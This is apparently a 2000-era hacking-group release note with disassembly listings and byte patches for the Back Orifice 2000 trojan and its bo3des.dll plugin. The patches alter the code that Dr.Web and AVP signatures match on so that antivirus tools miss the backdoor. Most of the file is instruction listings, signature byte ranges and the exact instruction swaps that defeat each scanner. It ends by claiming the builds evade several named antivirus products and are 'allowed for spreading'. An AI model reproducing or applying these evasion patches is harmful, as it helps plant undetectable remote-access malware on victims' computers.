000038AC: BE88650010    mov esi,010006588       <- (AVP)
000038B1: 747E          je 000003931            -------- (1)
000038B3: 57            push edi
000038B4: BF7C650010    mov edi,01000657C
000038B9: 57            push edi
000038BA: 6858650010    push 010006558
000038BF: 684C650010    push 01000654C
000038C4: 683C650010    push 01000653C
000038C9: 56            push esi
000038CA: 68C0450010    push 0100045C0
000038CF: FFD1          call ecx
000038D1: 53            push ebx
000038D2: 53            push ebx
000038D3: 53            push ebx
000038D4: 682C650010    push 01000652C
000038D9: 56            push esi
000038DA: 6850480010    push 010004850          <- if you change it, it will be bo2k.peep!?
000038DF: A390660010    mov [010006690],eax     <- AVP gluk ;-)
000038E4: FF15A8660010  call d,[0100066A8]

drWeb mask 3824 to 382B (any byte)
AVP mask 38A0 to 38E0 (may be any byte)

drWeb patch :
00003824: A384660010    mov [010006684],eax     <- exchange
00003829: 6A01          push 001                <- it (drWeb)
0000382B: 58            pop eax

AVP patch :
000038A6: 8915C8660010  mov [0100066C8],edx     <- exchange it
000038AC: BE88650010    mov esi,010006588       <- (AVP)

=-=-=-=-[bo3des.dll hijack plugin]-=-=-=-=

bo3des.dll: ----> program entry point

Web checking code:

00001E06: 8B442408      mov eax,[esp][00008]
00001E0A: 48            dec eax
00001E0B: 7509          jne 000001E16           -------- (1)
00001E0D: 8B442404      mov eax,[esp][00004]
00001E11: A3B45C0010    mov [010005CB4],eax     <- exchange it
00001E16: 6A01          push 001                <- (drWeb)
00001E18: 58            pop eax
00001E19: C20C00        retn 0000C

AVP checking code:

00001EBA: 8B0DC05C0010  mov ecx,[010005CC0]
00001EC0: 8325BC5C001000 and d,[010005CBC],000
00001EC7: FF35B85C0010  push d,[010005CB8]
00001ECD: 8B01          mov eax,[ecx]
00001ECF: FF5018        call d,[eax][00018]
00001ED2: C3            retn
00001ED3: 8B442404      mov eax,[esp][00004]
00001ED7: 6A01          push 001
00001ED9: 6683600800    and w,[eax][00008],000
00001EDE: 6683600C00    and w,[eax][0000C],000
00001EE3: C70034440010  mov d,[eax],010004434
00001EE9: C740041C440010 mov d,[eax][00004],01000441C
00001EF0: 66C7400A0100  mov w,[eax][0000A],00001
00001EF6: 66C7400E0100  mov w,[eax][0000E],00001
00001EFC: 58            pop eax
00001EFD: C3            retn
00001EFE: 8B442404      mov eax,[esp][00004]
00001F02: 83601400      and d,[eax][00014],000
00001F06: 83601000      and d,[eax][00010],000
00001F0A: C70001234567  mov d,[eax],067452301
00001F10: C7400489ABCDEF mov d,[eax][00004],0EFCDAB89
00001F17: 90            nop
00001F18: 90            nop
00001F19: 0990909090C7  or [eax][0C7909090],edx
00001F1F: 40            inc eax
00001F20: 0C76          or al,076 ;"v"
00001F22: 54            push esp
00001F23: 3210          xor dl,[eax]
00001F25: C3            retn
00001F26: 55            push ebp
00001F27: 8BEC          mov ebp,esp
00001F29: 53            push ebx
00001F2A: 56            push esi
00001F2B: 8B7508        mov esi,[ebp][00008]
00001F2E: 57            push edi
00001F2F: 8B7D10        mov edi,[ebp][00010]
00001F32: 8B4E10        mov ecx,[esi][00010]
00001F35: 8BD7          mov edx,edi             <- exchange it
00001F37: 8BC1          mov eax,ecx             <- (AVP)
00001F39: C1E803        shr eax,003
00001F3C: 8D0CF9        lea ecx,[ecx][edi]*8
00001F3F: 83E03F        and eax,03F ;"?"
00001F42: C1E203        shl edx,003
00001F45: 3BCA          cmp ecx,edx
00001F47: 894E10        mov [esi][00010],ecx
00001F4A: 7303          jae 000001F4F           -------- (1)
00001F4C: FF4614        inc d,[esi][00014]
00001F4F: 6A40          push 040
00001F51: 8BCF          mov ecx,edi
00001F53: 5B            pop ebx
00001F54: C1E91D        shr ecx,01D
00001F57: 014E14        add [esi][00014],ecx
00001F5A: 2BD8          sub ebx,eax
00001F5C: 3BFB          cmp edi,ebx
00001F5E: 7242          jb 000001FA2            -------- (1)
00001F60: 53            push ebx
00001F61: 8D443018      lea eax,[eax][esi][00018]
00001F65: FF750C        push d,[ebp][0000C]
00001F68: 50            push eax
00001F69: E8EC090000    call 00000295A          -------- (2)
00001F6E: 8D4618        lea eax,[esi][00018]
00001F71: 50            push eax
00001F72: 56            push esi
00001F73: E8B0000000    call 000002028          -------- (3)
00001F78: 83C414        add esp,014
00001F7B: 895D08        mov [ebp][00008],ebx
00001F7E: 83C33F        add ebx,03F ;"?"
00001F81: 3BDF          cmp ebx,edi
00001F83: 7319          jae 000001F9E           -------- (4)
00001F85: 8B450C        mov eax,[ebp][0000C]
00001F88: 8D4418C1      lea eax,[eax][ebx][-003F]
00001F8C: 50            push eax
00001F8D: 56            push esi
00001F8E: E895000000    call 000002028          -------- (1)
00001F93: 83450840      add d,[ebp][00008],040 ;"@"
00001F97: 59            pop ecx
00001F98: 59            pop ecx
00001F99: 83C340        add ebx,040 ;"@"
00001F9C: EBE3          jmps 000001F81          -------- (2)
00001F9E: 33C0          xor eax,eax
00001FA0: EB04          jmps 000001FA6          -------- (3)
00001FA2: 83650800      and d,[ebp][00008],000
00001FA6: 8B4D08        mov ecx,[ebp][00008]
00001FA9: 8B550C        mov edx,[ebp][0000C]
00001FAC: 2BF9          sub edi,ecx
00001FAE: 03CA          add ecx,edx
00001FB0: 57            push edi
00001FB1: 8D443018      lea eax,[eax][esi][00018]
00001FB5: 51            push ecx
00001FB6: 50            push eax
00001FB7: E89E090000    call 00000295A          -------- (4)
00001FBC: 83C40C        add esp,00C

drWeb mask 1E11 to 1E1A (any byte)
AVP mask 1EC0 to 1F90 (may be any byte)

drWeb patch :
00001E11: A3B45C0010    mov [010005CB4],eax     <- exchange it
00001E16: 6A01          push 001                <- (drWeb)
00001E18: 58            pop eax

AVP patch :
00001F35: 8BD7          mov edx,edi             <- exchange it
00001F37: 8BC1          mov eax,ecx             <- (AVP)

All patches were checked, but that is not enough! The best check is using it every day ;-)

II. S0luti0n
trust no1, and never trust antivirus companies :-))

antivirus patch for back orifice 2000 patch descripti0n
unlimited group
=============================================================================
unlimited gr0up
Home Page: http://infected.ilm.net/unlg/
Our Web Site: http://infected.ilm.net/
the biggest security Web Site: http://packetstorm.securify.com/
c0nfidential c0ntacts: 0nly "real life" chat
n0t c0nfidential c0ntacts: undernet#c0de or unlg@hotmail.com
PGP Key: i hate PGP and 0ther crappy t00lz XoR crypting rules! ;-)
Security public discussi0n: packetst0rm or b1nary illusi0n
Greetz: SGWW, UCL, uCF, SoS, 29A and other kewl ppl!
======================================================-[2000-01-13 UnlG]-====

second addon end
________________

latest releases: bo120p09, netbus160_p4
not detectable by: drweb 4.17, AVP 3.0 b132, Norton Antivirus 5.0 (and I wish 2000 too), sophos 3.29/AH

enjoy.....
checked: allowed for spreading...

cheers,
..fast^patch..
..b.$. //UnlG..
[e0f]